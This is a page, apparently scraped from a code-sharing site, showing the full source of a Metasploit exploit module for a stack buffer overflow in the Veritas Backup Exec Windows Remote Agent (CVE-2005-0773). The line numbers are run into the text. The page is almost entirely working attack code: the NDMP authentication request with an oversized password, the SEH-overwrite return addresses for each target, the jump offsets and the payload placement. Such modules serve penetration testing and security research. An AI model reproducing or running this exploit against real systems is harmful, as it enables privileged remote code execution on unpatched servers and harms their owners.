Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/backupexec/remote_agent.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::NDMP910def initialize(info = {})11super(update_info(info,12'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in the Veritas15BackupExec Windows Agent software. This vulnerability occurs16when a client authentication request is received with type17'3' and a long password argument. Reliable execution is18obtained by abusing the stack buffer overflow to smash a SEH19pointer.20},21'Author' => [ 'hdm' ],22'License' => MSF_LICENSE,23'References' =>24[25[ 'CVE', '2005-0773'],26[ 'OSVDB', '17624'],27[ 'BID', '14022'],28[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']29],30'Privileged' => true,31'DefaultOptions' =>32{33'EXITFUNC' => 'process',34},35'Payload' =>36{37'Space' => 1024,38'BadChars' => "\x00",39'StackAdjustment' => -3500,40},41'Platform' => %w{ win },42'Targets' =>43[44[45'Veritas BE 9.0/9.1/10.0 (All Windows)',46{47'Platform' => 'win',48'Rets' => [ 0x0140f8d5, 0x014261b0 ],49},50],51[52'Veritas BE 9.0/9.1/10.0 (Windows 2000)',53{54'Platform' => 'win',55'Rets' => [ 0x75022ac4, 0x75022ac4 ],56},57],58],59'DefaultTarget' => 0,60'DisclosureDate' => '2005-06-22'))6162register_options(63[64Opt::RPORT(10000)65])66end6768def check69info = ndmp_info()70if (info and info['Version'])71vprint_status(" Vendor: #{info['Vendor']}")72vprint_status("Product: #{info['Product']}")73vprint_status("Version: #{info['Version']}")7475if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)76return Exploit::CheckCode::Appears77end78end79return Exploit::CheckCode::Safe80end8182def exploit83connect8485print_status("Trying target #{target.name}...")8687resp = ndmp_recv()8889username = 'X' * 51290password = rand_text_alphanumeric(8192)9192# Place our payload early in the request and jump backwards into it93password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded9495# This offset is required for version 10.096password[3536, 2] = "\xeb\x06"97password[3540, 4] = [ target['Rets'][1] ].pack('V')98password[3544, 5] = "\xe9" + [-1037].pack('V')99100# This offset is required for version 9.0/9.1101password[4524, 2] = "\xeb\x06"102password[4528, 4] = [ target['Rets'][0] ].pack('V')103password[4532, 5] = "\xe9" + [-2025].pack('V')104105# Create the authentication request106auth = [1071, # Sequence number108Time.now.to_i, # Current time1090, # Message type (request)1100x901, # Message name (connect_client_auth)1110, # Reply sequence number1120, # Error status1133 # Authentication type114].pack('NNNNNNN') +115[ username.length ].pack('N') + username +116[ password.length ].pack('N') + password +117[ 4 ].pack('N')118119print_status("Sending authentication request...")120ndmp_send(auth)121122# Attempt to read a reply (this should fail)123ndmp_recv()124125handler126disconnect127end128end129130131